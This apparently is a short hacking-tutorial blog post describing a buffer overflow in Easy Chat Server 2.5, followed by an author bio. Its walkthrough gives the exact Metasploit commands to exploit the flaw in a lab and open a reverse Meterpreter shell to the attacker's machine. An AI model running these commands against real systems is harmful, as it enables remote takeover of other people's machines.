This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to “C:Program FilesEasy Chat Server”, is concatentated with “users” and the string passed as the username HTTP parameter.

Exploit Targets

Easy Chat Server 2.5

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/http/efs_easychatserver_username

Msf exploit (efs_easychatserver_username)>set payload windows/meterpreter/reverse_tcp

Msf exploit (efs_easychatserver_username)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (efs_easychatserver_username)>set rhost 192.168.1.8 (IP of Victim PC)

Msf exploit (efs_easychatserver_username)>exploit

Raj Chandel

Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry.His interests are mainly in system exploitation and vulnerability research. Contact me: [email protected]

More Posts

Follow Me:
TwitterFacebookGoogle Plus